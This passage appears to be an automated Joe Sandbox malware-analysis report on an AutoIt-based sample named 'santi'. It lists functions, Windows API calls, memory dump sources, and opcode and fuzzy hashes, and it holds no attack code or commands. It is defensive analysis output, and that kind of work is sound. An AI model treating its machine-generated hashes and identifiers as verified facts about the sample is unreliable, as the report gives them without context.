                                                                Function 00304D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __calloc_crt
                                                                • String ID: ":
                                                                • API String ID: 3494438863-2240744206
                                                                • Opcode ID: cb00cdba19d1d01bc73db41941a5a4a4ffc957f35caeeffd318b94fa824c33cd
                                                                • Instruction ID: 067f296e5da6e16afd0f9488c788ad2acc2a4b892c3ef26a623c88bc09401a5f
                                                                • Opcode Fuzzy Hash: cb00cdba19d1d01bc73db41941a5a4a4ffc957f35caeeffd318b94fa824c33cd
                                                                • Instruction Fuzzy Hash: 95F0C2B120A6029EE7679B1DBC617A767D8E745720F10491BF304CE6C6E730CA818A94
                                                                Function 002E4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadImageW.USER32(002E0000,00000063,00000001,00000010,00000010,00000000), ref: 002E4048
                                                                • EnumResourceNamesW.KERNEL32(00000000,0000000E,003267E9,00000063,00000000,75A50280,?,?,002E3EE1,?,?,000000FF), ref: 003541B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: EnumImageLoadNamesResource
                                                                • String ID: >.
                                                                • API String ID: 1578290342-2032304686
                                                                • Opcode ID: be8fb4f854b0a442dd70a0a110d881b227eed3e67464bc26a4a34d56e5b32a22
                                                                • Instruction ID: 9bd988d5893eb85c6d72e6e3c0f0390741312b41b84785de5a25d8585ee97269
                                                                • Opcode Fuzzy Hash: be8fb4f854b0a442dd70a0a110d881b227eed3e67464bc26a4a34d56e5b32a22
                                                                • Instruction Fuzzy Hash: E1F09031750364B7E2219B1AFC4AFD33BADE706BB5F104506F715AA1E0D3F090808B90
                                                                Function 00327744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp
                                                                • String ID: #32770
                                                                • API String ID: 2292705959-463685578
                                                                • Opcode ID: 3920edacee0bbc3020eaddb27b19320f402aceaa78da902323f2956e4e816d7b
                                                                • Instruction ID: ba93d23c867bf2121ac98e2cb7ba925d487b08b4ed34ed4d9efd7a2db9c152a9
                                                                • Opcode Fuzzy Hash: 3920edacee0bbc3020eaddb27b19320f402aceaa78da902323f2956e4e816d7b
                                                                • Instruction Fuzzy Hash: 84E0D877A0432527DB21EAA9EC49FD7FBACFB56760F010016F905D7081D6B0E60187D4
                                                                Function 0031A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0031A63F
                                                                  • Part of subcall function 003013F1: _doexit.LIBCMT ref: 003013FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Message_doexit
                                                                • String ID: AutoIt$Error allocating memory.
                                                                • API String ID: 1993061046-4017498283
                                                                • Opcode ID: 86746f2cb107561a445d8206e0e6afaa8951465b469956487555613be0f4628f
                                                                • Instruction ID: 0ce96c977a83a431187cdfc51362388e2fd3cf661467afe030f0e1cd5d8cf95b
                                                                • Opcode Fuzzy Hash: 86746f2cb107561a445d8206e0e6afaa8951465b469956487555613be0f4628f
                                                                • Instruction Fuzzy Hash: DBD02B313C572833C22636A96C17FC5764C8F04B95F044025FB0C991C24DD2859001E9
                                                                Function 0035AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0035ACC0
                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0035AEBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: DirectoryFreeLibrarySystem
                                                                • String ID: WIN_XPe
                                                                • API String ID: 510247158-3257408948
                                                                • Opcode ID: ea480457c9db31abb427863de2cc948c0b074f877113bf3ef9178880bb389f46
                                                                • Instruction ID: 888c5559bd0de5edc9ff768e358f6d7ab94ecf7ecaee3ea56013f3bbaa14e16e
                                                                • Opcode Fuzzy Hash: ea480457c9db31abb427863de2cc948c0b074f877113bf3ef9178880bb389f46
                                                                • Instruction Fuzzy Hash: 6CE03970C109099FCB13DBA8D984DECF7BCAB48702F108181E522B2570CBB05A88EF22
                                                                Function 00348698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003486A2
                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003486B5
                                                                  • Part of subcall function 00327A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: 4160672a4d18687030f89f9671fb2a0c6123d4eae322ed99d14791b5d3feb698
                                                                • Instruction ID: 1489b2883596b2ef2cba4b8e436d8672f4ce1862194fafd077fabe5c6aeab8a2
                                                                • Opcode Fuzzy Hash: 4160672a4d18687030f89f9671fb2a0c6123d4eae322ed99d14791b5d3feb698
                                                                • Instruction Fuzzy Hash: DED01275B85324B7E6766770EC0FFC67A1CAB05B21F114819F74AAA1D0C9E0E940C754
                                                                Function 003486CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003486E2
                                                                • PostMessageW.USER32(00000000), ref: 003486E9
                                                                  • Part of subcall function 00327A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: ada83533ab8e57db312cad653cbb452f70817e1fbbc0a91e2ba27368c7d37a19
                                                                • Instruction ID: 9d6b82f507deb520e4dedca2a1ffc08e287cc5b0ccf6bbea58cba716ccd8d121
                                                                • Opcode Fuzzy Hash: ada83533ab8e57db312cad653cbb452f70817e1fbbc0a91e2ba27368c7d37a19
                                                                • Instruction Fuzzy Hash: 86D0C971B853247BE6666770AC0BFC66A18AB0AB21F514819F746AA1D0C9E0A9408659